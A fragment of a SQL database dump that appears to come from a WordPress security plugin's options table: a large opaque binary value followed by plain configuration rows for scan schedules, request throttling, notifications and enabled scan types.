?���4�_Mf7I����\'�4��w4�6���0H[�<O[�@�����2�@_�𖮪��\n��վ���b�\Z�z��X���g#}�o}}9�������Mת�O��yK�I����g���b�Ɛ[�M�^�����[�����/O�w؂�;������Y�ro�!ʑ��\'����.ݤ�I?�=�n�7K7;QK?d�H�,�O��֠[M��Qh�u�Q�5͖n���~�AJw�Ew�,�;z��#��Gu\Z�N���N4���a�3��YaJw�(�y��zq;�M?qo��tϊ(��A=�׏�O��o��~ָ�~��=�W�АF�zH<�����:�C~��_�r�~Qe�~��4=\"�>=�=�k��t3=R��~}�4=*�=���I��O��%��㣵��)�_���u�ۏ�����Z�I=m8��.W�g�_EϨ-�gLb��Zz�# ���q��z�P\'=�C��C��&���d��L�����e��Bx\0��y=��T�^B���7�ѫ�������?#��_�O�_h��_@x�&}czSZ���Nz���-�-�^�7Z��7{��o����z��Iz�G&�����ǘ�k������@���H������P0}t�!}���X}\"ɀ>eRD����\\_O��A�5�D�;3M��XL��С��t�\':��:b�C:�f���{�����њ:t��k:z�:�@�D���\rt,چN,5��-�Db$�H\'�T����t��I:�C�.U�i{�_>t�~\'��~��xD�3(�t&@g�l���>�ً:�Y\r�[I�1��]t1@��?C����t���dm�/�}�/�EЗ���K�^���E�J�W���f�j�\'C�\n�PK�`�u��b�jc��#�Z�n�f� c�E�z�\\�v�j��	.C\'@��=����1t\'����5*��?�N0vDE2v�_�ػ�+c���ax͆a�bJ��}�w�C����f����X���Q��3����g�#�#��G4GR60�,2���O��Yo�s�?Ù��p9��pI>�p)��8.|�p+�3�P���\r�n�G7�q�5�q����y���څ`xeex=���0NO g`/~����������\0#P�d eY�f�{��8_2�)ud\\���t�#TNc\\s~θ�NfD�3\"��He7�zQ3#ʣ�c�Ĉm�0�\Z��ڌ�5��{�ɥ�)�9�T����3��5�Nw}�w���9]���{���݌���|�FѼ\n���x�\0�x����Fپ��2����\'�bŨ���QqgT��3�=�3jgԌ%2ju���׌GT�u��\'�>3�jE1\Z�[MZWMM0F�@Fs���{��od4c�͂�������nƻ]?�r���������8{F[��=����%�#�����p*��\0�腕1�5�1�2�\0��c���1y�1t��v�ι�~��1�1�_�}��1��%c\\K��80>�j3>�M1��_�_�ɖF��q�8�1����g�X��\0���\0��e��g2�H�%p�w��@n��@=00��20܍,`�\'1p���[���|�A��0(7t4m!�v��Và�N0��*�ܕ��FbpLZ@�;���|a��c�\rR�1���!�P�P�f,F82�f+ϲ+�g�/�L�OG��n1U/�0U�0U�fL���LuX s��~��#0s�x\'S�D���e��dnn<�ܲ~���ٌ�?p�����ܭ���g�s����+�~�\Z�=���ML��A�AX�t����i�\rg��ҙ��3�G3�N2-��1�sL�w�m��-I�iw��>~=�>w�i_��yd��h����1��k0�K�1�,3��72]�73ݞ�c�[�2O(T���*L��ϝG��!טgT�g0UL�){�Y=3�Y�f@�>3���y�Ƽ�e��?��Kd�[���G�1�i@f���r�?���W-��W�.1�b1��`F�\"�ћ�1�c[�љư��7k��i\nf��f��3A�ļ���<:�L�af��c�1��̾S��ny�̆�ي?�\\q83�X&3����\'��,R�b9w2�<f>�$1K<��R�5f�m�J�Cf��:��}�ZӉYS�Ŭ)^b�o`�~1낿1?��|r�����w���0�l�/g>�z�|�w�)��|�e;���l�$0�<�`�=Bg�~Kb�_�`�<��}f~8�������T\r�����{��ٯy�9�*�9|��;ǜx����<�9�w�9��b��1��t+��Ek��|�c\"s>}�9�g���)g��� �(&��	��΄�1��wL8�#!�0q�<&��;&� �I��$�{2��\'�D��II�3�晴�d&\r c�`�L�8���?2����LNe�C����gr�\'���0����)��)[e”�`�Z2����!sE��������R���Z�=��������y���ֲ�/6����Y:�V,��X�t3��,o�&c$kS�kS���Y�Omf������:`q�e2��u0��e�²�}�uH}�uH+�e��`��Y��j,[�!��œej�H�k�������rz�r\"�Y�YS,g\Z��R7�r!N���س�y�r�?�r�g��Y����S1ˬS#,������}�\0�̵�,��&���V@�+��9D\Z��UVH�\'+$;�R7Ⱥ�4ͺ4��\n_�e]�9NJ��eE�6���Ċ�n`E�W����n�5b�ܙ̺�����\\Š�?`ſy͊_4b��^e%f�`%5�X�~լ��qVJ�YV*(���8��~���i���,�be	�����Y�sY9m�������T+���в�U8_�z��;�t�=V��lVe�wV�[{V���U5��U��2��`�:*X��o��\Z���\0X�����92��O�ӒU���q����)����	��~���1��w\r�kW���7�I��O�Xo�_X��W���S���dV�\"��ի����>f��c�U(Y}ʝ��k���+;X���Y���q�^����/-�o��X߈6��7Xӎ�XӤ������8]֏�W���X֯�e��UP�\\Hkn&������5�\re�G|d-��g-LZ�\0�;Y��,�\0��~��d�i�,h�~��XY`���P�7X�Y�3�E�������`��,r�\r%ˢn!��\"m+v�����M��^�X�{WX\\�q�\ZKP��%��%r-g��.�d\nM�\\k\'K����4Dz7��3��,�YK��r�/[�t{U��:^�V�a���ׄ���q�\ZZcl��R�Ƴ`�Z��ډ9��W2{��m��ԇ������t`�&M�7�leo��go����Ϛcoߴ��������m`��6(>�6薲��&���:��������؆��l�,&�@�2��T�6)+b�Ta��D�;�f���e�ζ�/e[E[��b�����`ۘu�m��l�p=�]\"�md��HdMub;>e;�R�N&l\'�9�ٶ�}ܸ�}Be��OLe�Ą�=��ا��l��*�w�;���>�/��j���*�\\�_�y�L���z���{��E��!���K�v(�;�e;|����:�J�?���$;\"œQǾzx�}m��ڿ3�H���h�/���ɎI�c�|mf�뫳Kٷ�؉����^vꛭ��0v��v&��}Gr�}gy��e���}q���Kb��a�wO��\"��@vj��x���IvѬ��O1���W��3��+���Y�\nO/v�	sv��zv�t-����p�~8\nc?�a?r�e?�hd?�a?�7b?��~����t�;v�-5���^�gI���즵f���K�H�����Wv;دg^�[�?�[��o�*�o�߱[#�mH}vG.��]�����������7re�3��O6;��.��!\'���!���\\���{��Q�t�)��M�lZ7{�%��k�,{�r�=�}����+�o��\rx�����۰�?N��;��P�6��Fl�����HJ>���F߹��\n�x�q6�C�M6�d�r���\rl�%����^~���S�܄&6���-�hc�%���\n��le�4{i���$��^9���2y����G}�g����գ�8\Z���k�8kՇ8�qֽt嬏dp��8��\"���\n��6�ު���*g+(���%g��g�m.gІ��~��W��cT��c�{����*%�\Z�s0;�spv��m�c�Õca;ȱ��ϱ|~�c�c�>�9,{ȱ�Pʱ1����slW�8vDz8vi�<���_�c]/�x�s���&ǥ™s|\"�s��-��$�㖚�q����B=�x���x�q|,9�>�8��Μ3�8g�9~&f����l�l�9N��vN�	}Np�n�9����\'�f��!(\'I�\\��Ź\\�͹�ʑsE3���\\��\\MZÉ�l���snf97=���/rn���Ā�9�í��Ċ͜d�=���;��5DN��\'�l\'�d\'��mN�,�ݱ�=�d�}|\'��]N�`\'Gt��_�)�_�)����b8E½�^}�Ev������<�ȩxy���&��0>�S�{�S��SgVǩN�<Z.�<Y-��k��4X��4��q���q^q���9M\r��6I�W�78�\r�8-�\'9mW\"9mm�v�`N�ԓ����_�z�}��X�9=/�9��ɜ~��O�X�׏�������J�pWgtl+gl#�3�{�3>;ę�!p&x�7]\Z�,�3�™�~Ιn��L9ę�L�̐��ٶ`�w�?��8�O���_Ŧ���9������uO9��G8�w�9���8�� ��A��]8-�`^rp��y�ou��\Zb�9�l[ˡ�94}mp�y�+�9z��\Z��p�8�!�@�!GP��`�9š�8�G�W�#�ȑ r92���ش�����w�\Z�F�]eB�Vr���\rs׭��]�o���Ӈ�����ں��ur���c��sg��	���s���Zd��סp�͒�����J��#6ܽ��\\C\r�!��5\\��\Z���\Z�sM֌sMX@���A���3״�(�t��k�j�5SFrQ��Vi�Vm��V|׮�u0��uȺ�u��纆�p]��q݊�q�#�����K&\\��o����Z��֋`P�\rB�q�k��sy���P��X��d�#��КC��FKn(6����Ↄ��+g�p�4p�M�Eܫ)xn��7nԫ��h����+���7�\'rc���X�,7��6�-.�{��M<+�&�}��+׹i�<n��7��9n:Ǔ��5�fl5���\\���r�[Z��3���n��in�J7���_��-:V�-��rH0�b���/�[~�<��\\>��I����>:��}���d#���1��T��P��mX��6��6Rm��)��M�ܦC-�W�+�w��VV4�=m������,��˚ە����%q$R�`.�;2�����Y]����!����;Q��;��zņ;	��~s��ΘjqgMqg	�٥���?\"�?\"M�?w���Z���K���΁;_t�;�SpN������s�]>\\ ���UゑH.�~��w���p�K_��$.�ћ�TTr1�F.>:�Kt��%��d�.��.���eq���~.�w�����\rjs���\\��%��W\"s�J7K����\\��^��rW��P��ZOe�3o�O��U�ڴ	o��r���K�5��<���<\r�=�Z�!o�j?O+�.O������t��x�bosJ:O�Io�o��L�v�������g�����֗����];�3ܾ�g(���w\'��?�\rϨM�g���3i]�;�)����;�(�w��+���g�.�g�\'�g�oų�`ϳ�cij�e�<�<���y��~��nz���򎼊�9��9&i��M�V����yNh �i)���s�r��2��`m�y��x\'�y\'75�<��*��|_��|������m%�9�.��.Y#y���ya���˜m�+��yWi�x��y��Kx1�?�bd����5�X�w�/��\n�U:���x�����+f���^�^0/u�/\r<�ˠy�2��xw^��y�����xY�xY��y9Iq��ͺ���r^b/�p�^�퇼b�\Z^��;^�����+۝�+��c\nx�^Ż*^��+�҆˫�ȫ&���o�����I���:�����y\r\'�x\rm;y\rދ#R��K�&����#��i����Q^������t��1$�u^*�}�g�p.�����׃$�>��>1My�\"x>_x%��Ag��F�`�&ox��7S����A���{�/���&�Px�B�y��wy��`��\'9o���m�/�����9|1�O�\r�B�o���W+��w1�PA�\0�y�P���A<P�V�f\0�˙E���zHz�~zb+�z��G��1�l�1��ط�y�=v<N�/c�����.�y�͑<~HO��O�Z��$�D�\r<�AO��Sh�y\n1������x�o�eoQ,᭔y�UvY�U>��*b_���w|U-_����_�9��k��5ͪ���T��6.�ׇ�lN�78M�Ê��F�������[7�o�B��t���e���4��]��߃���w�o�q��_^�?�j�?�ŋ\0�`��7���M|��\'|S��|�*m|�ߥ|�<��5��2���v�����l��|g��%r����wKQ��f�=�Z�=�\'���O2n�OJ��O��򽍳�މR������\Z#~\0Џ�1�ʾ�?��1������+��������/m�ſ�O�z��*��6�_N��_���Gl��G�n�_�������\0�z�~Lc-?v��ۼ�;\"�Ǣ���Q�����1~bu5?鮂��������;��K\"~�?��m��EY;��t�����p��M�+<���9~�*\Z��q#�Qt�Ij�)F�o���7NJ��ҷ�,���[L�/����Z濾���\Z��c�����d�����o_�w���w�z������L��w���{՗���h~��&�ȳ �h�c��<�?������O�}��N�ɟ~RşM����	���*�N����p��ҋ�r� ��|Г>��5>tM	Z��CQ�pB\r�����c�_�c��X��|l���]�\'�1�E�I�����|�<�Ϡ�O�|�e>�=�5���Ս��C_��|�_#���@��e�j�L�V�.Xsy�`͓�����-kwi�>�].h�\n��U�u;=�>k\n�[\n�\\��ͮo[��l�~/�J�#��!�g��٦\n��}��)�j\"	v���.�	vwi���W��\n�&\ns��>�����z�	LO�L�����Z���.�yA��\\�$�x�K`����������)�^�,��(����Xl9�Y��vZ�uN�j\'p���nu���\\m�7����{���G�8#��N]x-8�Z�Ţ�a��ϛ7��\r��kA�K]A`]��ܱ(����z�o)�_\\���\nB�B``A�#��(տ%�w@p��KpU�Yp����zt� z�����AL�� F�)���~���	R��R_CiN:��`;A�c� �Q� � S�&�S�*�{��nA���<A�a��@#BP~{��2㨠ƷJP�U*���<��<���/H\rvY���P�3U����1sA�v�+�Z��}�WvF��	��m����jA�%A�G���$hoLt�)t>�	�cmnh>>\nz��z�}=�F���:A�(D��z(LhU��]_�*U�%��\n��	�.���1_����`r�`Rj\"���(��.��!K��,H�K�I0�wF\0�\n�iW�;&(+��`O�p�a�yI\0��+@:����U���;�+\'�\Z��d�C@^�-� &Է�4C��fW\'`��X��	�!>v�U��X )},�f�t,���%�F��G,9,k�	Vc�j��ժV՞�\nպ�B�3k��ᗄ�Q�\r^p����B�}.\'�z����z�����;;�����}�=�B#�o��LCh��Qh\"�\"4\r+��͓M�_3�V�	B57�\r�[h�Q&�_�:n�&<�s��l����i��9�	�X�B��d���q�L$<q{Vx� <�f.<��z��>zzB�3��8��t�f��9ᙸ|aPՈ��aHA��b6Oxq.Yx��0̵^n�&�<�*��^w^G���\'�Q\07avLxC����Kga̾ta̩��X�,a�}¤��䶫�dn�0��#L�R.L�{+�x�,�b\"�{�JxO7_x�K(̆���掯毬DE	�l$¢w>��hka�I��4�BXͽ/��֢ͅ��[º\r�u:@a~DX\'�*|��)|��6�c�ϫ�_��F\n��U�M��—��Wy�Vc��}f���麰mz��}[��=x���6\\��\"�)����W?�tl��#*X��R8GG����C���;�T�p��*�q�(�����?���i�>N��k)���\n�������ݝ!�8&>&�Z���	���(A���$�l&1	6��#�:)��k��D�y!�ꀐ|�Z�h|\"dm�����.!��Q�`�k���W(���\'\n�N�B�]���)����~�ʿ�\n+KB�p��g��\0�\"�N�tjT���W�,��e��u��rE��}Y��F�h-�h-eQ�>-��i[�tdS�M�lі#��-+q�����{ 2��Ut0�GdֶUd����ZthS������8��W��\'�D�9�\"{�-��N��א�-Lt��)rz*r�Q���Ɗ\\w��\\�D��9\"W�e�[���]���C�Etj����?��G�7�V�M�N��(��K��(:�#:;��<�����?D�n������)]H@�.�.���%�PZ�/�ܻF�qTA�$��N����];T#�vU!�4�-�2|!��Eg鈢q�D76��n���n�Eqt�(�G�(q!J�z)Jv���Ê2�2�=\\���(;fT��h�(���(�,*tM�D��D���R닢R��Ҷ�ҟ���h5Q���r=���ל��=)���OT}>_T��=L? �M.��=YZ��=u����h�^ly#zQ��<���+�+9+z�}\"j=^\"jm>&z�m�͚��3�E^ˢ.�\r�.��n@��G�]��-�?�!�w��>==\'�D9/\Z<�\rm<-\Z._\r���ƪtE_���ɣ<�d|�蛱��� �v䈦=D��A��ߢ����`�hna\\4�;-��,G���F�o�LE���\"pP�~A.�\'��\rX:�%��a�uD����^D\\�\'\"}�&\"?�ћ�DLK��u�IĶ9!���6{�x�n�L�H��	8a\"ɟt��i@$-RL׊����U���U�S�Um�ū~���9�U5�Ī�qb�\0��3\'���5;��\Z�z�Z���F�xC�w�n|�xc�Q���m�;�[������;�Ļ�ĻmO�\r��_{Vl���+����b��Cb�Sqb���b���b�z���g�-�Bl�)�;՟;��+v���O�<�,�#�S�]���4q�g�8��J\\�.����ig�CDc���/?_J9!��C|���[��y�Aq�_�������2A�J&���\'����o���o�u�Is��$C���$NNM\'?8,N��Z��_�\"-�%�S���i���;�6�eBq�^�8/tX���C\\xIM� \"I\\�k����KhqهNq#�88$��; ��tY\\9e+�rŋk>l׽x-~\\�^\\��U\\O~+~�:)~�$7Ԕ�H��^���g���l���f��⦅O�f�qsL���qW�+����Y8q˶_�+��o���j��������;J�;���~��}Uq��Mq�琸���xp6Y<�.W��[���\'��_4�\'�k�_�O�\\O�\\O��g�G����Ŀ�<ĿWΊ�m��+�¾1ШF��C�����HR�]�J��~V����\Z�D�!1y{��ܳY��Yw%bVI�>!f�͋E��)�;�ŋ�|��I�{R��U+^�JT~LIVGI46�K4\r�J�d�p�D��D��dS��d�Q7ɖ�A=A�D�c�d��k�]��-C�A�>�ނ\n���}Yc#Vbz@ ��Y+�LN�X-\\�.CJl\Z]$6�L$�׏Hl��Kl�.I��7I�Ӓ���%�|��eq��u����i���S���s�I[K�gk��+k��瘣�]�$��@8��ߑ}*	�2��ؒib��C��L��\"k�$�\nQr-�Y�Qrf+��2-���$���&�Y�Y�-����*aIn��Hn�hH��~���$飫%�M�;��;ѯ$���Hrn.Jr\'$yF����.I�QSI��I��Iak���P.)n��wHJ��%oK*=�I*r$U}a��Վ��8I��D�D��fܓԥa$u�ڒ��I������:�䉞���8V���#y�攤�<T��� i]AI���N���{���G�)�-N��s%��$H�Va%c�%���d�K2��d2�E2��d���{��dn9T���wo�@�YJ��=8�J�jBH0\'%��*	�5VB:�EB\Z_���%�c�J�r뎄:�!���HHXׯJ���JD�?$b�i��ݨD2a+�7�J�$��p�źC��]֒�Cw%����U�M�U���U�T5�@�f\'U�}�j@�H�J�.�H�YK��^�ͷ~I���I�`̥ۦ	RN�tOv�԰\"Uz��/5�&w��&��RӧR�ن�R����վ���w��X���Bz:/u��&u\"�J��K��Б��K��W�\'��^��ϸ���/��G��#��u����U�Ҡэ�sQ!��}��!�I/UKÃ�H#���W}�W���k����u��p�F_9*�騔�LђƉf��7B�	M҄n�-/�&u�m�`�m�.���$��Ҕ�\\iʋjijb�4mRW��%M��-ͼ�NzǧWz7��I�4��Yz�Vi^}�4�{��薕�xs�����_ZڰNZއ�V�H+wOK+[J�,ӥU�)Ҫ7����ZҚ��҇�\r�:�Fi�O����Y��x��11G��%}�J�u+����H�\'�H��I��K_�aK�W�H�?����r���^���,���dH[x��G��$Ki�k�V�:iG�giǭ`i\'�W��p_�}�R��M��7�@��B���]��?�GoHjZ���ҡG:ҡA�t�p�tD0-���~��.�V,��,C�����tP�k���ۼ�W���]�`=%]�H���J1Rȵ�R`I\n@H��P)�E��E���jt�X�)6e�w�,�_����I	�\")��;)�3XJM;\"�V��R�:���o�!_��\0H��R�F��Ӓ��\"�oR�	]*�Ke7\r�ʄ5ҥG�KP����)�Z�l�Cٚ\r��u�e�\"�d����æe��2��/�\r�d��2�e��v2��2�@�l����;2}�q�>r����o�T!3L��&_�N6�1�e�o��+ 2�u�2#���<Vv�n�̴�+3;�!3�3\'�H0�Y����z]vh���J��0AOf_�/�_ˎ�\'e�2�W)2�[Q2�ޏ2W�n����[9W��-���T7���/�y� ;ů�����|ZO�|���3����52�ɲ@�bY�|��\\X�����͏d�S�e��h�+�Q�+HGYk��*��\"Rvm�^ٵ�����e����Ȧ<Y䈁,:��,:��,�(�%��ݚ|,�\r~&Kl˒ԣd)�e�������;�,��\r��,�Yֻ]������!Y.2L�W��#�e<dųBY��HV��IV:�%+��)��\\(��{KV��$��,��\\�j�Kd���=l���n��re��N��Ų�?����rY��;�g��d�z2d/=�^5��^�e���eo�Y�6k����FY��eY;�)�d��z�7�z�1����eU�\0\"L6��I6�&��}�֔}[̓MUȦiWd��u�YX�l�Ô���E��k���n���D���雲?�ò�b�_\r������� �ɐ��d��{e(?C��M��W�p7;d����NF�+#>���U/����d�p͢FFÒdt�z�8C�Z�#c��+c1��8;d@���Q(pjd���e\"k[��U�L��Q&�J��/�ʔ\re�jt��mٿ|3ٿ�;r�A�|�G��`�|���|MN�|�\\�n����u����w�ɵ�dr��A����\\\\���|��q�4L�c�|�`�|��\\�wPMn�#��,߿n��\0���<Vn�G[n�=Wn��/7���<�+7�~Gn֝-?�l\"�\\;+���,�2�[\'��o������?�#?�~[~�6M�P�\\�@���l�Q����?˝N4ȝ�F��^�O�j�OH��=7��=�\n�&f�>�<�χP��r��&r_�g�Y�X\\ȗ���+�TxF� C����_�)���I�Gj��on��<a ��ԓ�T��qE�����:�<�g���A���J�$��\'���S~?��@�����S���ۣ�yIpy�K�<o�D^��,/��G�K���K+��ҡ!y��:�O�ȳY�8��I��k��!�Y�ZP�y_��U��m\nY��X ױ oe�����m.��v׃��fy���C)����;+;����n����Y�A�Z�a�I��}�|���|��S>*!�Ǣ��c?��/��ɿ��Ol��O�˿�ȧR�g�G�g�nȿ�u������ݑ�AS��b���	\\�ה*^� ��Tɡemr褳��$��J��1r�~��p^�zC��_��cw1�X��w�Д��l���R&\'ѳ��\0;9u&g�N�3�l��<�9Z29/맜�a��7œ���\"��HT,�����	��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)΋r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���󮢱^K�챢�l�⥎��U�M�k3����׍�-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J	�����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B	����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;΢��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU�	/\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','0','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1675307400;i:1;i:1675566600;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','license','yes'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1675048200','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions